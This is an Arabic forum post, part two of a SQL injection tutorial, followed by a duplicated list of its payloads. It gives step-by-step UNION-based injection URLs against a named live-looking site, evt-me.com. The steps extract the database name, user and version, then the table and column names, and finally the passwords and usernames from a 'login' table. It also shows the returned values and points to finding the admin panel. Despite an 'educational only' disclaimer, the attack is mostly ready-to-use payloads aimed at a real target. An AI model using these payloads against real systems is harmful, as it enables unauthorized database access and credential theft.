بسم الله الرحمن الرحيم والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم وبسم الله نبدأ اعوذ بالله من الشيطان الرجيم بسم الله الرحمن الرحيم والحمد لله الذي هدانا الى هذا وما كنا لنهتدي لو لم يهدينا الله السلام عليكم ورحمة الله وبركاته ثغرة sql جزء 2 انا شرحت لكم ثغرة sql جزء 1 وقمنا بشرح معرفة الموقع اذا كان مصاب بهذه الثغرة sql ام لا و تعلمنا كيفية معرفة عدد الأعمدة و معرفة الأعمدة المصابة لمشاهدة الموضوع اضغط هنا اليوم شرحنا موسع جدا جدا ويجب تشغيل العقل 100% فاليوم الدرس الاخير لمعرفة هذه الثغرة سنتعلم كيفية استخراج اسم القاعدة و اسم مستخدم القاعدة و إصدار القاعدة إضافة الى ذلك معرفة عدد جداول القاعدة + معرفة اعمدة الجداول + استخراج ال user و pass الدرس طويل جدا ولكن انا متأكد لن تخرج قبل فهمه ولكن اول شئ عليك صبر و التركيز ولا داعي للتفكير بشرح روابط نبدأ على بركة لله عز وجل: اولا)أستخراج أسم القاعدة و إصدار القاعدة واسم مستخدم القاعدة في أمر واحد لدينا هذا الموقع evt-me.com/newsDetail.php?id=8 وقد قمنا في الدرس السابق معرفة الأعمدة المصابة ووجدنا ان الأعمدة المصابة هي 2 +3 والان نقوم بحذف العمود 2 من رابط ونضع بدل منه كود HTML: concat(database(),0x3e,user(),0x3e,@@version) بمعنا اخر يصبح الرابط كود HTML: http://www.evt-me.com/newsDetail.php?id=-8 union select 1,concat(database(),0x3e,user(),0x3e,@@version),3,4,5,6,7-- database():لاستخراج اسم القاعدة:evt_evt user():استخراج اسم مستخدم القاعدة: evt_badr@localhost version@@:معرفة إصدار القاعدة:5.1.63-cll اما بالنسبة ل 0x3e فهي لتفصل بين كل واحد يعني مشان ما يطلعوا كلهم جملة واحد ثانيا)أستخراج أسماء الجداول من اسم القاعدة عن طريق الإمر التالي لاحظوو كود HTML: concat(table_name) نحذف الامر السابق ونضع الكود الموجود في الاعلى لأستخراج اسماء الجداول من اسم القاعدة ونضع في نهاية رابط قبل ال - - from information_schema.tables where table_schema=اسم القاعدة المشفر لدينا هذا الموقع لمشاهدة الموقع أضغط هنا هذا موقع لتشفير تضغط اولا على sql char encoder الموجودة في يسار الصفحة ونكتب اسم القاعدة فيقوم بتشفيرها ثم نضع التشفير بدل من كلمة ((اسم القاعدة المشفر)) اذا يصبح الكود في النهاية كود HTML: from information_schema.tables where table_schema=0x6576745f657674 تمااااام اذا الموقع في النهاية هكذا كود HTML: http://evt-me.com/newsDetail.php?id=-8 union select 1,concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=0x6576745f657674 استخرجنا الان اسماء الجداول من القاعدة غالبا يكون ال username & pass في جدول Login او user وغيرها ...يعني بتكون واضحة جدا نجد اسماء الجداول كثار ولكن انا وجدت في هذا الموقع جدول باسم login اذا هذا الذي فيه ال user و pass بقي خطوتان فقط ونعرف ال pass & user مممممم الخطوة الأولى) معرفة اسماء الأغمدة في جدول login اولا نذهب لموقع التشفير و نشفر كلمة Login ثم نقوم بمحي ما كتبناه في العمود 2 ووضع كود HTML: group_concat(column_name) والان نضع في نهاية رابط قبل - - ما يلي كود HTML: from information_schema.columns where table_name=0x6c6f67696e 0x6c6f67696e اسم الجدول login مشفر اذا نحذف ما كتبناه سابقا و نضع الكود الموجود حالي اي يصبح الرابط في النهاية كود HTML: http://www.evt-me.com/newsDetail.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=0x6c6f67696e نجد انه قد استخرج لنا اسماء العواميد كلها id pass username position fullname اكيد انا محتاج username و pass اما fullname فأكيد ما بدي لانو ما بدي اتعرف على admin ههههه طيب والان الخطوة الاخيرة تضع بدل العمود المصاب 2 هذا الكود كود HTML: concat(pass,0x3e,username) طيب اكيد username و pass حسب ما تجدهم بالجدول يعني لو جدتهم user password كان بدك تكتب هيك ( كود HTML: concat(pass,0x3e,user على حسب ما مكتوب بتكتب تمااام والان نكتب في نهاية الرابط قبل ال - - ما يلي كود HTML: from login طبعا على حسب اسم الجدول يعني لو كان user كان from user الفكرة وصلت والان نضغط على Enter ومبروك عليك ال pass&user والان نذهب لبرنامج الهافج مشان نلاقي مسار لوحة التحكم طبعا الشباب شارحين عليه كثير واذا طلبتوا مني بعطيك شرح وافي انا برئ من كل من يستخدم الطريقة ضد العرب و المسلمون الغرض تعليمي فقط.. الحمد لله الذي علمنا هذا و جعلنا نعلم غيرنا لا إله الا انت سبحانك إني كنت من الظالمين للأسئلة و الأستفسارات اترك تعليق يتضمن السؤال وان شاء الله سيتم الرد او ارسل رسالة على البريد الإلكتروني [email protected] facebook:Omar Al Lord والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم بالله عليك لا تخرج قبل ان تصلي على نبي 3 مرات مو ضروري تكتبهم بتعليق ولكن في قلبك والحمد لله رب العرش العظيم وشكرا جزيلا على القراءة حفظكم الله وهداكم وهدانا والسلام عليكم ورحمة الله وبركاته لا تنسونا من الدعاء تحياتي
concat(database(),0x3e,user(),0x3e,@@version)
http://www.evt-me.com/newsDetail.php?id=-8 union select 1,concat(database(),0x3e,user(),0x3e,@@version),3,4,5,6,7--
concat(table_name)
from information_schema.tables where table_schema=0x6576745f657674
http://evt-me.com/newsDetail.php?id=-8 union select 1,concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=0x6576745f657674
group_concat(column_name)
from information_schema.columns where table_name=0x6c6f67696e
http://www.evt-me.com/newsDetail.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=0x6c6f67696e
concat(pass,0x3e,username)
concat(pass,0x3e,user
from login
We are Syrians We are Free Sunni, Shia, christian I don't care We are all free Channel: http://www.youtube.com/MacBook3rabi Twitter: https://twitter.com/macbook3arabi We are White Hats hackers, We don't Hack we protect
قوانين المنتدى
